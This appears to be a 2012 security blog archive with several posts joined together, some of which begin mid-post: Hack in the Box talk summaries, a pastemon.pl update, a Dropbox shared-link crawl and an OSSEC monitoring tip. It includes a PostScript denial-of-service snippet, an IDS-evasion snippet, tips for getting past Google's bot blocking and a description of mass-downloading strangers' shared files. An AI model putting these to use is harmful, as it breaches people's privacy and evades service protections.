Do I still need to present him? He came to talk about  ”Trust, security and society” which is the topic of his new book. Bruce has always a new book to promote!

Bruce Schneier Keynote

In the real life, we feel safe. We trust people all the time (the taxi driver, the server at the restaurant, the pilot who brings us to Amsterdam, etc). Society does not function without trust. How society makes this work? Trust is a really complicated concept! When you say “I trust a friend“, you speak about the person, not his actions. We can also trust actions of people in a specific context. Back to the first example with the taxi driver, we don’t know his motivations, we just trust him to drive us to our destination safely. Another example: trusting a server who gives us a bottle of water. For airlines, you don’t trust people (the pilot) but you trust the airline company which should produce skilled pilots. You don’t have to know how a system works, you just trust it (ATM machines are a good example). But if there are too many factors, the system will collapse. “Parasites” can only survive if they are not too good. Security is how we can set the level of trust to an acceptable level, otherwise it will collapse. They are different types of pressures:

• Moral : We fill bad if we do, we don’t want to (Do I steal those goods or not?)
• Reputation: What people will think of your behavior
• Institutions: They have rules and enforcement has been delegated

The problem with the two first type of pressures: They don’t scale (societies are growing) And what’s the power of reputation? Bruce gave a funny example. In a company, people can buy coffee. They have to leave some coins next to the coffee machine.  At the end of the day, a comparison between the money and the number of coffee cups give the percentage of people who paid (or not). A study showed that only be adding a picture of eyes behind the coffee machine, the number of paying people increased.

Technology allows our society to get better in lot of different ways (more people, more complexity, more social network, distances, frequency, etc) Wait, it looks like a definition of the Internet. Internet is just a copy of the real society from a security point of view, new attack vectors are used by criminals like in real life. Attackers can make use of innovations faster cause they are not limited by boundaries. To maintain good security is to react quickly by evaluating what attackers will do next. A final problem is that society is not always right. The assumption that a group is correct is not always true!  It this topic interest you, read Bruce’s book! Bruce is really a good speaker, no slides just stories and real-life examples!

After a coffee break, Andrei Costin talked about the danger of PostScript files. Why PostScript? MFP’s (“Multi Functions Printers“) carry a lot of abuse potentials. They contain confidential documents, they remain unpatched, they are (sometimes) facing the Internet or are available on the network. Modern printers are targets since a decade! Did you know that lot of printers are facing the Internet? And generic MFP payload delivery occurs using Word or Java. Back to PostScript! PostScript is used to handle complex procession tasks. This is a programming language: Stack based and turing-complete. PostScript printer driver transforms document to PostScript streams for specific devices and data stream on PRN. Windows based systems can process PostScrtipt files  too (via an interpreter) and execute code on your PC. PostScript is like a Java sandbox. It has simple control statements (if/else, loop, while) and simplest DoS is an infinite loop:

!%
{}loop

Demo time! How to kill Word with less then 10 characters.

PostScript Killing MS Word

Another demo: “Dynamically types concatenate” aspect, by example to evade IDS:

({) (}) (l) (o) (o) (p)
count 1 sub { mergestr } repeat
cvx
exec

Next demo: Real world application: MS Office PostScript crash! What about GhostScript? Dynamic document forging/generation can be used with some Social Engineering techniques. Andrei gave an awesome example with a rogue PostScript file; If the file is opened with Ghostscript nothing happened otherwise the malicious code is executed. Example of a real attack? On a PC the invoice show an amount of 100 EUR but once printed: 1000 EUR Who will read the document just printed? It will be signed! As said Bruce before, we trust the printer!

PostScript can also address some web2.0 issues? Some online services are also vulnerable to rogue PostScript documents. 20+ online services were found to be vulnerable at different level (Google was one of them). Some fun facts? Some GhostScript are running as root. Some runs GS without -dSAFER, some run vulnerable versions (heap and stack overflows).

What about physical devices? Installation of firmware upgrades is performed via PostScript documents. Admin restriction fails to prevent memory dumping. Even if devices are protected at interface level. API’s remain available. HTTPS/IPSEC secrets are “default” and “leaky”: they are in memory! Printers protected by a PIN code or a badge reader are also vulnerable. Document is also available in the memory!

Memory Dump of a Printer

Can you imagine performing a network scan via printers? Printers use lot of protocols to detect devices on the network. Guess where this information is stored? In memory of course, using the same techniques, you can retrieve information about the network topology without using any active scanner on the network. To perform social engineering, coupons, discount codes are great! People like free stuffs! Conclusions: Don’t print suspicious documents. Printing is bad for environment but also for your security  Andrei’s papers are available online.

The next talk I attended was “How to use Taint to find vulnerabilities?” by Alex Bazhanyuk and Nikita Tarakamov. In parallel to this track, there was the one about the new IOS jailbreak. But I decided to stay in the same room to follow Nikita’s talk. Too many people went to the jailbreak session.

Nikita Tarakamov

What is taint analysis theory? Taint sources are network, keyboard, memory, disk, function outputs. Taint propagation is a data flow technique.  Static taint analysis is performed over multiple paths of a program. More information about taint analysis can be found here. BitBlaze is a binary analysis infrastructure to automatically extract security-related properties from binary code. SASV main parts are IDA pro plugins and BitBlaze: Vine + utils, TEMU + plugins. Then I was lost, too complex for me!

After the lunch break, there was two talks in parallel about mobile operating systems: “Bypassing the Android Permission Model” or the second part of the IOS jailbreak. I decided to attend the IOS one for the fun. There were rumours that the new jailbreak will be released! The talk covered the A5. There is no tethered jailbreak on A5 because there is currently no public boot level exploit for it. But they found a way to use Racoon as an injection vector. The problem was: How to copy Corona files on the file system which is read-only at boot and how to bypass ASLR? VPN settings are not validated by configd before being passed to Racoon. The dream team explained step by step how they successfully exploited the while stuff. One the payload installed, the next step was to find a way to trigger a VPN connection? They discovered that Safari can trigger this to perform certificate based authentication.  But typing an URL in Safari is boring, they used a Webclip.

The Dream Team

Next step, the sandbox. What’s the sandbox? Code name “Seatbelt“, based off the TrustedBSD MAC (“Mandatory Access Control“). Sandbox.kext is a registered MAC policy. How to get the patched copy of raccoon (1-modified byte) onto the device? ptrace is not working well and Apple makes it unrestricted but it can control an unsandboxed process. To resume:

• Create a non sandbox version of raccoon
• Find notified PID
• Put notifyd’s main thread on the IPC thread
• Block notified with our exploit IPC message
• Write rest of ROP stack to shm
• Launch the exploit

The team explained in details all the steps to own the IOS devices. More information available here:

• http://www.semantiscope.com/research/BHDC2011/BHDC2011-Slides.pdf
• https://guthub.com/dionthegod/XNUSandbox

So, after the talk, the official news of the day was there: the jailbreak for 5.1.1 is publicly available but greenpois0n.com was temporary down. My opinion, they brought it down during the talk to be sure to release the exploit at the right time. This announce caused a flood of Twitter messages! People were following the talk worldwide waiting for “the” announce. Congratulations to the Dream Team. Once you see the talk it seems easy but they passed days of investigations to achieve this!

The next talk was about the Amazon cloud services. It started later because the speaker, Kenneth White, was unavailable!? When he started the presentation, he first talked for a long time about health researches (viruses, diseases) and the associated processed to remediate to them. Finally, he switched to the main topic: Amazon! Everybody knows this major player in cloud technologies. What are the promises of AWS (“Amazon Cloud Services“)?

• Scaling
• They are busy with the boring part of the infrastructure
• On demand
• Pain reduction
• Zero procurement headaches
• Cost (!)

The killer feature is indeed the cost of the public cloud! You will fail if you compare VM’s to a cloud. Your SAN/NAS is not the cloud. Could you survive to a DDoS without the cloud? Finally, by using the cloud you can focus on more interesting stuffs in your job. Kenneth reviewed interesting information about AWS. Who’s behind?

Who's Behind AWS?

What’s their grow? Some interesting numbers: They hired 22.5K new employees. They advertise 800K public IP addresses. What about their data centers infrastructure? Most information is publicly available:

• Facility built-outs, availability zones & regions
• Power capacity and redundancy
• Pictures
• Physical , process and technical controls.

About the data centers, did you know that they are build by one of the most powerful company called Digital Reality? To analyse their backbone, BGP is your best friend. But you’ll have to take time to analyze all the peers!

AWS Datacenters Locations

I expected more details about Amazon. I was a bit disappointed by the content of the presentation. The real Amazon stuff started at the middle of the talk!

Finally the last presentation was performed by Marco Balduzzi about “SatanCloud – a journey into the privacy and security risks of a cloud computing“.

Marco Balduzzi on Stage

The talk used Amazon (again!) EC2 – IaaS (“Infrastructure as a Service“). Marco refreshed our brain with a brief review of the cloud computing. Most of us are using the cloud everything. You use gmail.com isn’t it? Three models exist:

• SaaS: Software is provided (ex: salesforce.com)
• PaaS: Computing or solution platform (ex: Google apps)
• IaaS: Computers, Storage, firewall, networks are provided (ex: EC2)

The talk focused on IaaS where the market leader is Amazon. EC2 provides access to a virtualized server (Amazon Machine Images). AMI’s are provided by Amazon but users may provide their own images as well as third-party companies. AMI’s can be build from a live system, from an ISO or another AMI. Configuration is simple: credentials, resources (sizing), the region where start the instance and an inbound firewall. The instance will be available via a public IP like “ec2-IP-region.computer.amazonaws.com” over SSH/RDP. First important thing to keep in mind, Amazon don’t care about the AMI security! Then Marco reviewed the problem of sharing images via the Amazon catalog. What are the threats:

• Secure it against external attacks
• Malicious image providers?
• Sanitizing the image to protect the privacy of the provider

A tool has been created to automate the security analysis of images: SatanCloud. It performs a remote scan using Nmap and a local scan using Nessus for local vulnerabilities (only the critical ones for performance reasons). What were the findings?

Detected Vulnerabilities in AMI's

Incredible: 98% of Windows and 58% of Linux AMI’s came with critical vulnerabilities! 87 Debians AMI’s still had the notorious SSH vulnerability. Two AMI’s where infected by viruses. Some Trojans with key logger were found. Two Linux AMI’s were configured to send logs to a remote host! Some private keys can be installed on images and left behind the execution and use to make new images.

Leftover Credentials on AMI's

About forgotten keys? 56 private keys were found to log in to other machines. 54 of them even not protected by a pass-phrase! Linux systems have shells which generate history files. Those files were also scanned and 869 history files were found:

Interesting Data Extracted from History Files

The next investigation was: Are deleted data really removed? AMI’s can be bundled using different methods. Block based building methods are vulnerable to file undelete attacks. 1100 Linux AMI’s were inspected using extundelete. They recovered 28GB of data! (SSH private keys, PGP keys, password files and many documents). And for Windows AMI’s? WinUndelete is your best friend! Same issue…

This research was performed with the contribution of Amazon Security Team. Vulnerable AMI’s status was changed from public to private. A tutorial was created to help customers to share their images in a secure way. Good collaboration from Amazon!

Lessons learned? Prepare your own image otherwise update the software, enable the firewall, delete (safely) unwanted data, check for outgoing connections => harden your server as if it was local (best practices). A very good talk to share with all system admins who play with Amazon EC2! My preferred one for the second day.

The closing keynote was given by Jaya Baloo from Verizon: “Identify, Privacy and Security“. Jaya’s first question was: “Isn’t it time the Internet had an identity solution?“.

Jaya Baloo on Stage

We have too many passwords. This generates too much risks and, for enterprise, it’s complex and cost money. A question immediately raised from the audience: “Why complexity is bad?” Jaya think that a simple authentication mechanism could benefit to the security of users. “We need an identity ecosystem in the cloud“, Really? The challenge is a good balance between privacy and identity insurance.

A mention to an interesting online service provided by rapleaf.com: They grab data from the Internet and based on email addresses lists you have access to plenty of information (age, gender and location are free). Why collect identifies? advertising market! Privacy legislation is principally aims to protect you against government and specific organizations. But it does not address against organizations or the mistake of their employees.  Jaya made a good review of the problematic of the implementation of a unique authentication system.

Then the closing ceremony with the results of the different contests and a word from the organizers. This year, the venue changed and it was (IMHO) positive. The hotel was nice and close to restaurants, bars. I left immediately after the talks and was unable to say goodbye to old and new friends. So I do it now: It was nice to meet you once again (for some), for the first time (for others). See you soon!

I’m back in Amsterdam for the third time to attend the Hack in the Box security conference! Thanks to the organizers, I received again a press pass to cover the event. Thanks to them! So, here is my wrap-up of the first day. This year, I was also present as a speaker for SIGINT. SIGINT is a bunch of “small talks between the talks” where people are free to present their research, their tool in a limited time window. After a safe travel from Belgium and the classic registration procedure, it was time for a small breakfast before the start of the busy day.

The opening keynote was presented by Andy Elis, CEO of Akamai. The keynote title was “Staying ahead of the Security poverty line“. He started with a fact: To measure the quality of your security, just count the number of phone calls you receive outside the business hours! But what’s the security poverty line? Another fact: Organizations don’t have enough resources to implement perceived basic security needs. The syndrome of security subsystems is “I can’t even do the barest minimum to cover my ass. So I’d better not do anything but cover my ass“. Then accruing Technical Debt: With every step forward, the undone work increases risks and makes future steps harder.

The value of your security can be computed with the following formula:

Value = Resources x capabilities"

Where:

resources = time + money
capabilities = skill x effort x effectiveness

Keep in mind: Nobody is going to implement perfect security. This means you have no risk but doing business is taking risks! Another reference is the Peltzman effect: What your organization thinks it can get away with… If you take away risks, you’ll take more risks. Andy gave a nice example with the NASCAR races in the United States. Very popular and safe but pilots take more and more risks!

The security value and perceived risks should be in balance. Security is an habit to remove risks. What are the perceived risks vs actual risks?

Perceived Risks vs Active Risks

Another fact: Don’t beg for money! Based on security news, people decides to spend money for security solutions! Example: Wikipedia got DDoS, we need an anti-DDoS protection. Hackers break a website, we need a WAF! That’s not the best way to implement security.

What about security awareness? The problem: auditors believe that if we just train people, we’ll get rid of problems. That’s bad. The solution is to perform simple security awareness training, web-based and automated. Don’t blame people for being pwn3d, let them share their experience! Andy’s slides are available here.

Then the real talk started. The first one was about performing Android forensic: “Turning Android inside out” by Ivo Pooters. The idea of the talk was: Can an Android phone be used to investigate a man’s death (is it a suicide?) or to investigate a data breach? Those examples were not real cases but were part of the DFRWS Forensics Challenges 2011.  First step: How to perform the data acquisition? Useful data are present on memory cards (easy to read) or in the internal storage (NAND flash) with multiple partitions like /data & /cache. To make a copy of the internal flash, common tools remains useful:

# dd if=/dev/block/mtdblockX of=/sdcard/mtdblockX.img

What about the tools? There exists specific forensic tools like enCase, FTK (“Forensic Tool Kit“), Photorestore. Android uses the YAFFS2 file system (“Yet Another Flash File System version 2“). How to read such file system? Via forensic toolkits (Cellebrite UFED), via the Android emulator or load the YAFFS2 support into the Linux kernel:

Enable YAFFS2 on Linux

Once the file system mounted, use your regular tools to find for relevant information (IP addresses, names, file names, …)

Two types of analysis can be performed:

• Live analysis: Using an Android emulator + ADB, Wireshark, Dalvik debug monitor and logcat
• Statis analysis: Retrieve the APK’s, use APT-tool to convert AndroidManifest to clear text XML. Convert dex (Dalvik VM) to regular Jar (dex2jar). Decompile using jd-gui or another java decompiler.

Then Ivo wend deeper about the YAFFS2 and explained a technique to retrieve content when the file system is corrupted. Normally, on classic file systems, even if they are damaged, it’s possible to get files back by using file carving techniques (Note that the new Android devices do not use YAFFS2 anymore but they are a lot our there). Nice presentation which proves that our preferred toys contain a lot of personal details which can be almost always retrieved using the right tools and techniques.

The next presentation was about automatic malware analysis using Cuckoo by Claudio Guarnieri. I was waiting for this presentation because I’m currently playing with commercial solutions to analyze malware and I’d like to compare them with an open source one. What are the problems with malware analysis? There are way too many  pieces of malwares. Manual analysis is simple impossible. Static analysis requires strong skill sets! So sandboxes are the best solution?

• Pro: Automatic, process lot of work, usable by anyone, get the code executed
• Cons: Commercial solutions are expensive! Some portions of the code cannot be executed, VM’s could be detected and it’s difficult to successfully automate the exploit analysis. Finally, without proper consumptions of the results, it’s useless.

The preparation is mandatory to define requirements and expectations, the environment must be properly designed for data and integration with other systems or storage solutions. Some questions to ask to yourself:

• Why do you need a sandbox?
• What do you expect to achieve?
• What information is most relevant to you?
• Who will use the results?
• Which types? (PDF, browser exploits, Microsoft Office document, PHP/Perl scripts)

In most cases, Cuckoo can provide an answer to those questions. It can analyze lot of stuff, can be customized and integrated with other frameworks. It generates Win32 call traces, dropped lines, screenshots, network traffic dump and reports. It is based on three components: Scheduler -> Analyzer -> Reporter.

 Claudio performed several demos of Cuckoo analyzing different types of malwares.

It looks to be very reliable and I recommend you to test it (who never received a mail with a suspicious attachment?). If you don’t have time to play or resources to run your own instance of Cuckoo, why not have a look at: malwr.com. This website is a front-end for Cuckoo and work like virustotal.com. You submit your files and they are analyzed. Claudio and his team made a great job. This tool is definitively on my todo-list! Note that the current version only supports Windows VM’s but they are working on MacOSX and Linux versions.

During the lunch break, I presented my tool pastemon.pl and the associated website leakedin.com. This is the second time that I present it (first time was during BlackHat in March) and I received positive comments about it. It seems that people are interested in the pastebin.com content. The session was well organized and I was very happy to see many people take time to listen to me. Thanks to all of them!

After the lunch, I attended the presentation called “Whistling over the wire…” by Arnauld Mascret. Behind this title, Arnault explained how to find interesting information from open sources (OSINT) and how to create new tools to perform the intelligence phase? He explained from A to Z how an attack can be conducted against a victim using mainly the social network Twitter and an URL shortener service. Is it possible to perform stealth targeted attacks? Yes, the main idea is to use your own (rogue) short URL service and promote it on Twitter to attract your victim to use it.

Twitter Attack Surface

The different steps were deeply explained one by one up the live demo of the victim’s compromised computer. Conclusions for this talk: The risk is low. You need other vulnerabilities but all the tools are available and it works! Question from audience: How long does it take to realize this kind of attack? Arnault’s answer: “It depends on the victim but a few weeks at least!“. This proves that attackers have plenty of time to conduct their attacks! (compared to limited scope assigned to pentesters).

The next presentation was about digital satellite television. Adam Gowdiak gave a deep overview of the security threats in this domain. Let’s be clear: modern Set-Top-Boxes are complete computers and became more and more complex. They are online and users don’t have a clue about the risks (“Hey, it’s just television after all!“). Most of them runs on Linux with a Java VM for applications. I learned that Java Applications (Xlets) can be broadcasted in MPEG streams! Even if Set-Top-Boxes have good security mechanisms (Embedded SSL Certificates, HTTPS scheme only, chroot sandbox, IP tables, no listening TCP ports, statically linked binaries, custom JAVA file system, binary code obfuscation, etc), Adam demonstrated that they are also vulnerable.

Set-Top-Box Architecture

How to get device access? Adam explained all the steps to fully pwn the box starting with a Java script injection via a rogue photos album name. He successfully executed code, accessed the file system and memory and leaked file descriptors (/dev/kmem, /dev/mtd0). A demo was the capture of some streams outside of the box. Nice talk but less interesting for me. In parallel to this one, a talk about SAP (again!) was held. To conclude his presentation, Adam expressed his curiosity about the new connected television. For sure, they are also vulnerable to similar attacks.

The last talk of this day: “Windows shopping, Browser bug hunting in 2012” by Roberto Liverani and Scott Bell. Why Browsers? Because they are everywhere and nice targets with all their extensions! This talk could be called “The browsers wall of shame!“. Roberto reviewed in details several attacks on different browsers:

• Firefox Use After Free < 11
• Maxthon – XCS and SOP Bypass
• Avant Browser XCS & SOP Bypass
• Firefox, patched in 3.6.14
• Opera Use-After-Free
• Firefox/Opera – XCS

Firefox Use-After-Free PoC

I won’t give details about the exploits here, they are fully reviewed and explained in Roberto’s slides. Just some conclusions:

• Disclosure fail! (Opera this one is for you!)
• Bug complexity vs impact (injection bugs are simple but impact can be significant)
• Delegated security (presenting browsers as secure as IE or Chrome give false sense of security to end-users)

Last but not least, Rop Gonggrijp – a well-known Dutch Hacker & Activist – presented the closing keynote. He came in emergency to replace the scheduled speaker. Rob is a great speaker. What did he say? The repression is there! (instead of fixing the security issues) Governments dreamed of controlling us. It’s done! Are you aware of the printers yellow dots? They want total surveillance but “If cyber-crime increases by a factor of 10, can it be stopped by surveillance?” asked Rop. Data centralization is already over, we are now decentralizing everything (in the cloud). We continuously update our profiles online (linked in, twitter, etc). If you are living in Europe, you already uploading your data to a power block you don’t control. Is working for a national security agency safer than for a Romanian cyber-crime cartel? How to make the world a better place, safer? Selling security problems to nations is not responsible disclosure!

Rob Gonggrijp

This closes the first day! Note that all presentations are made available online a few minutes after each talk. You find them here. Tomorrow, I’ll write the second wrap-up. If you need to follow real-time reactions, don’t hesitate to follow me on Twitter (@xme) or friends like @corelanc0der or @seccubus who are also covering the event. Tomorrow will be for sure the “Apple Day”

What’s new with this version? First some bug fixes! (yes, I’m writing buggy code!) But there are also new features/options.

• Opposite to the “_EXCLUDE_” feature, I added the “_INCLUDE_” one. This could help you to give more granularity to your regular expressions. Example: To search for references to the Visa credit card, use:

  +4[0-9]{12}(?:[0-9]{3})? _INCLUDE_ (visa|credit|card)

  This will reduce false positives. The pastie will be flagged only if it contains a credit card number and one of the three words in the same text.

•  All the configuration has been moved from command line arguments to an XML file. It became difficult to maintain them in a single command line. The new syntax is simply:

  ./pastemon.pl --config=filepath [--debug] [--help]

  An XML sample configuration is provided in the repository.

• If you enable the dump of pasties to a directory, the matching regular expressions are added as headers to help you to remind why they were dumped.

• SMTP notifications have been added.
• Detection of duplicate pasties is performed based on the Jaro-Winkler algorithm. Pasties which are “close” to an already matching one won’t be reported.

If you’ll attend Hack In The Box in Amsterdam, feel free to come and say hello!

But if your files are available via HTTP(S), this means that anybody can access them. We just have to guess valid URLs. Guessing the 15-characters strings is doable (brute-force) but will require a lot waste of time. Where can we find plenty of existing URLs? In search engines of course!

I wrote a Google crawler and let it run during approximatively ten days. It was not easy. If Google is a champion to grab our data, they don’t allow extensive use of their search engine! You are often blacklisted and have to fill a CAPTCHA. They present you a  “sorry page” to prove you are not a bot:

But some techniques can be implemented to evade their tests:

• Search across multiple TLD’s (easy, they have all of them
• Change your User-Agent string randomly
• Use open-proxies randomly
• Do NOT use Tor, they blacklist the exit-nodes
• Use other anonymizing services (like anonymouse.org)
• Add random sleep() between queries

My crawler searched for pages containing “http[s]://[dl|www].dropbox/s/*“. For every hit returned by Google, the corresponding URL was also visited to parse and extract the Dropbox shared links. Finally, all found URLs were visited (500.000+ pages were processed) and data downloaded. Of course, a lot of them provided the same content or same links (example: all conversations in forums, mailing-lists archives).

Interesting to mention, when I downloaded all the files in batch from Dropbox, I did not implement special techniques like the ones to search on Google. And I was never blacklisted! I’m just wondering if Dropbox have controls in place? Did they see my traffic?

All the files were reviewed and here are some findings. Let’s start with some statistics:

• 2240 unique Dropbox URLs were found
• 1762 files were downloaded (HTTP 200)
• 116 requests returned an HTTP 403 error
• 332 requests returned an HTTP 404 error
• 45.57 GBytes was downloaded
• The biggest file was 2.09GB (a RAR archive with WAV files).
• Average file size: 26.32MB

A “403” error corresponds to a bad file name (ex: typo error in the URL). A “404” means that the file was removed by the Dropbox user. Here we can already make a conclusion/recommendations. When users share files with open links, they often don’t remove it once the file has been downloaded by the third parties. For me, shared links are temporary links! Dropbox allows to “cancel” a shared link without deleting the file.

What are the most shared file types?

What were the most obscure file type? Just two examples:

• A Fortran source code
• A x86 boot sector

Some filenames were explicit and attracted my attention immediately (like “Report-04-2012.xls“). By doing this exercises, you immediately understand why social engineering attacks are so successful and why people suffer of “clickmania“. It’s really tempting to open such files!

First, the pictures. I was surprised: only one picture was pornographic material. Lot of screenshots and error messages were found. I also saw a lot of pictures of good for sale and, a classic, network schema’s! 50% of the pictures were took using smartphones and contained of course interesting EXIF data (GPS coordinates).

The office documents were also a good source of findings. To briefly resume, I found:

• A list of weapons (!) for sale (pictures, prices, stocks)
• Political documents (propaganda)
• Resumes (with all private details of course)
• Employees lists
• MDB files (Microsoft Access)
• Business plans
• Attorneys documents (infringements reports)
• Meeting minutes
• Manuals (cars, mobile phones, tools)
• Student thesis

The best one was for sure a complete scan of a real-estate contract completed with all details:

(Click to enlarge)

Of course, I scanned the files with an anti-virus (ClamAV). On the 56 executable files found, only 6 were infected with Trojans (10.71%). I also found a lot of Android application packages (*.apk) files. I did not extract meta-data from those Office files but I’m sure I could find interesting stuff too.

Another interesting finding? Developers also enjoy the Dropbox sharing feature. I found lot of source code (HTML, JavaScript, XML, PHP). It’s easy to develop and share your source code, no need to upload your source files, just share them and include them in your applications. However, when you download the file directly, the source code is disclosed. Example: https://www.dropbox.com/s/388v3j55z4210e1/test.php.

What can we conclude from this small analysis? Dropbox links do not reveal who shared the file. There is no way to find back the account owner, except if personal information are disclosed in the shared file. And… they are! Shared files are difficult to exploit to collect information about a target (during the reconnaissance phase of a coming attack). Anyway, keep in mind that shared files can be read by anybody! This feature must be used with due care and attention. If you really need to share sensitive data, encrypt them! Which is always good when sending files into the Dropbox cloud…

This morning, I received several alerts like this:

** Alert 1336642415.2196887: mail  - ossec,
2012 May 10 11:33:35 xxxxxxxx->ossec-monitord
Rule: 504 (level 10) -> 'Ossec agent disconnected.'
Src IP: (none)
User: (none)
ossec: Agent disconnected: 'xxxxxxxx-10.0.0.1'.

This message warns that an OSSEC agent is not alive and is very suspicious. And a few minutes later, same message for another server, and so on, one by one… After a quick check, all servers and network connections were fine. The problem was on the OSSEC server itself. A typo error in a new rule put some processes in a fuzzy state. Killing and the process and restarting properly the OSSEC server solved the problem. This example based on OSSEC is just an introduction to the topic of this quick blogpost: When you deploy security monitoring solutions, be sure to monitor them too!

In parallel to the security checks performed by your log management solution, extra verifications must be performed to control the flow of events and, when required, trigger other types of alerts. A classic situation is when events are pushed to the log management platform. It will  wait passively for incoming events. This can be resumed as “No event received? Everything ok! Let’s have some sleep…“. Examples of suspicious situations:

• You did not receive any new Syslog events from a specific host for x minutes.
  → The Syslog daemon might be down or a network outage prevent UDP packets to reach the Syslog concentrator.
• If you did not process new lines from an Apache log file.
  →Apache might be in trouble or the file system might be full. Can you read the log file? (wrong permissions)
• You did not receive any new alerts for x hours.
  →Your log management system might be overloaded, some process killed or a file system being full.

There are plenty of nightmare example like those. How to prevent them?

• Like any other information system, keep an eye on the system health (control the CPU, memory, storage, processes). Disk space is critical and directly depends on your amount of data and retention policies.
• Send keep-alives to your remote [pollers|sensors|agents] (whatever you name them).
• Control any derivation of your regular events flow (compared to a baseline for a defined period – hourly/daily/etc). Example, is it normal to not see any login events from your Active Directory on a Monday morning?
• Implement queuing mechanisms to prevent events to be lost (when they are automatically pushed to the central system).
• When possible, collect events using pull technologies. If the log management platform has troubles, events won’t be lost and will wait until being retrieved later.

Don’t forget: Log management solutions are your best friends when you need to investigate a security incident. There is nothing more frustrating than gaps in your events timeline!

The French hacking event is back! This year is a special one, it’s the tenth edition of “La Nuit du Hack” which follows the conference “Hack in Paris“. Yes, as the previous editions, there are three distinguished parts in this major event. Trainings are organized from June 18th to 20th (more info here). Then, two days (June 21st – 22nd) of talks with famous speakers. And finally, an “event into the event“: La Nuit du Hack will be held on June 23rd.

During the last edition, 950 hackers registered to follow more talks and participate to the CTP challenge. This year, a public wargame is also available! Feel free to test the 2011 challenges!

I’ll be present the Thursday and Friday to cover the talks and I’ve also some gifts for you: Like for the previous edition, the organization provided me 10  discount codes (-10%) on “conference only” tickets. The contest is now open! The first ten people who drop me an email (xavier{at}rootshell{dot}be) will receive a discount code… (FIFO!)

• A .lens file to let Unity load it
• A daemon with a well-known name on D-Bus
• A D-Bus .service file to let Unity activate the Lens

When Unity is started, it parses the configuration files and spawns the small daemons responsible for the searches. On a stock Ubuntu, you can see the following daemons running:

$ ps ax|grep lens
 2741 ?        Sl     0:05 /usr/lib/unity-lens-applications/unity-applications-daemon
 2743 ?        Sl     0:04 /usr/lib/unity-lens-files/unity-files-daemon
 2745 ?        Sl     0:00 /usr/lib/unity-lens-music/unity-music-daemon
 2747 ?        Sl     0:01 /usr/bin/python /usr/lib/unity-lens-video/unity-lens-video
 2777 ?        Sl     0:00 /usr/lib/unity-lens-music/unity-musicstore-daemon

If you’re interested in learning more about Lenses, there is a good documentation available here. Some people started to write their own Lenses to search for useful online data. Some popular ones are:

• Wikipedia
• Google Contacts
• Youtube
• Torrents
• Flickr

Basically, any website that proposes a search feature can be integrated into Unity as well as any online service! (ex: whois) The daemon needs to send the query based on the provided keywords and format the results into something usable by Unity (via D-Bus).

I decided to learn how to build my own Lens. Why not create one with more focus on information security? What can be interesting to search for if you’re an infosec guy? Vulnerabilities of course! Let’s imagine, you are performing a pentest and you find a unpatched Solaris box running an Apache server. It could be nice to search for vulnerabilities affecting those solutions. That’s the purpose of my Lens: searching the OSVDB database for vulnerabilities.

Type some terms (or dates) and relevant OSVDB entries will be displayed directly in Unity. Click on them to open a browser to the direct page!

(Click to enlarge)

By default (empty search), the latest vulnerabilities are displayed (sorted by time). You can also search for a specific period by specifying a month and a year (ex: “Apr 2012“). The full-text search feature of OSVDB is used (ex: “Cisco IOS 12.1“). There is nothing fancy, most of the code is based on another publicly available Lens. It was first of all a good opportunity for me to write my first piece of code in Python!

Source files are available on github.com. A Debian package (.deb) is ready to be installed. A logout is required to restart Unity and makes it recognize the new Lens. Once installed click on the little “OSVDB” icon on the bottom of your Dash to search for vulnerabilities. Feel free to use it, patch it or submit your comments! Enjoy!

BSidesLondon Track 1

I’m back from a small trip to London where is happening some kind of a “security marathon” this week! In parallel to InfoSecurity Europe 2012, several “alternative” events where organized in the same area. However I did not visited InfoSecurity. I was present at the Benelux edition a few weeks ago and saw enough vendors/products (ties overflow). After a nice ride under the sea and having dropped my luggage at the hotel, I reached my first step: the Information Security Blogger Meetup. The pub was fully dedicated to people from InfoSecurity (sponsored by Firemon) and a space was reserved to the bloggers but not so many people present (although 40 people registered). It was a bit disappointing but, anyway, it was a good opportunity to meet Andrew & Kelly Hay and Javvad Malik. Thanks for the sponsor for the open bar! By the way, I missed Brian Honan with a bow tie!

The next step was a few streets far away: the 44Café and DC4420 were organized in another pub, the “Troubadour”. There was much more people and an atmosphere close to the one of real security conferences (read:  ”beers and talks”). I came late and I was only able to watch the Adam Laurie‘s talk about the security of RF communications (based on  433Mhz frequency). More and more gadgets with RF interfaces, are found in our houses. A good example are the remote controls for electric devices (to turn them off/on via your sofa or bed). Most of those devices are made in China and do not implement any security control at all. Adam performed a nice demo. He sniffed the original RF signal using a specific dongle and the “rfcap” tool. The captured .wav file can be analyzed and replayed using the same device. And he successfully powered off/on the LED lamp on the stage. Awesome! Of course, this has a limited impact (a very low operational range) but… Once the DC4420 over, I went to an Italian restaurant with friends to continue discussions about security.

After a short night, let’s commute to the next step: BSidesLondon! This was the second edition. I won’t come back on the history of BSides conferences, here is a reminder. The conference moved to a new venue, the Barbican center, a very nice place!

The Barbican Center Garden

First talk of the day was the one of Robin Wood (@digininja) about “Breaking in to security“. A few weeks ago, Robin asked to Infosec professional to answer a few questions about their career (via an online survey). The goal was to produce a definitive answer to people frequently asking “How to start a career in information security?“, “What programming language learn to become a pentester?” or “Which certification should I get?” First, it seems that people are not aware of the reality and media report often a bad idea of the “hackers”:

Infosec Job Reality

Some stats extracted from the survey:

• 43% of people who answered are active in information security for more than seven years
• Interesting job types: 33% reported being “log analyst” and 25% busy with “incident response”
• Do you need to be a programmer to pen test: no but it helps (62%), yes (26%). The goal of programs is to automate boring tasks.
• Which language are preferred? Top-3: python, bash, ruby
• Which Certs are useful? SANS/GIAC, CISSP, Offensive security (PWB, AWE, …)
• Is attending conference important: YES (88%)
• Which con? All of them had a mention

Then a live interview (real case study) was performed with Wicked Clown. Don’t forget that security involves also dealing with people, public speaking, negotiation skills, writing report (boring ok!) and networking. Security conferences are a must to attend even if they are often bad for your liver! Have also a look at mailing lists, podcasts, forums. Don’t be afraid to ask questions and to learn. Today it’s easy to build a lab at home using virtualization.  As a conclusion to this talk, only one word is important: “passion”! Remember: It cannot only be “a job”! Robin’s slides are already available here.

The second talk was about Social Engineering: “What is it & how is it done?” by Ian Maxted (@TheJeffVader). He started the presentation with an history of social engineering. Did you know that it started with a book published in 1946 (name). Then he reviewed several techniques to collect sensitive information. Classic places are smoking areas or coffee machine in companies or pubs! Of course, with the new “Y” generation, social networks are a great place to search for useful details to contact further attacks. Ian showed some examples of fake websites. Note that such interfaces are quite easy to build, even by script kiddies but it’s sometimes not easy to persuade the victim to visit them. That’s what makes social engineering interesting. The goal is to establish relationships! Great introduction!

Social Engineering

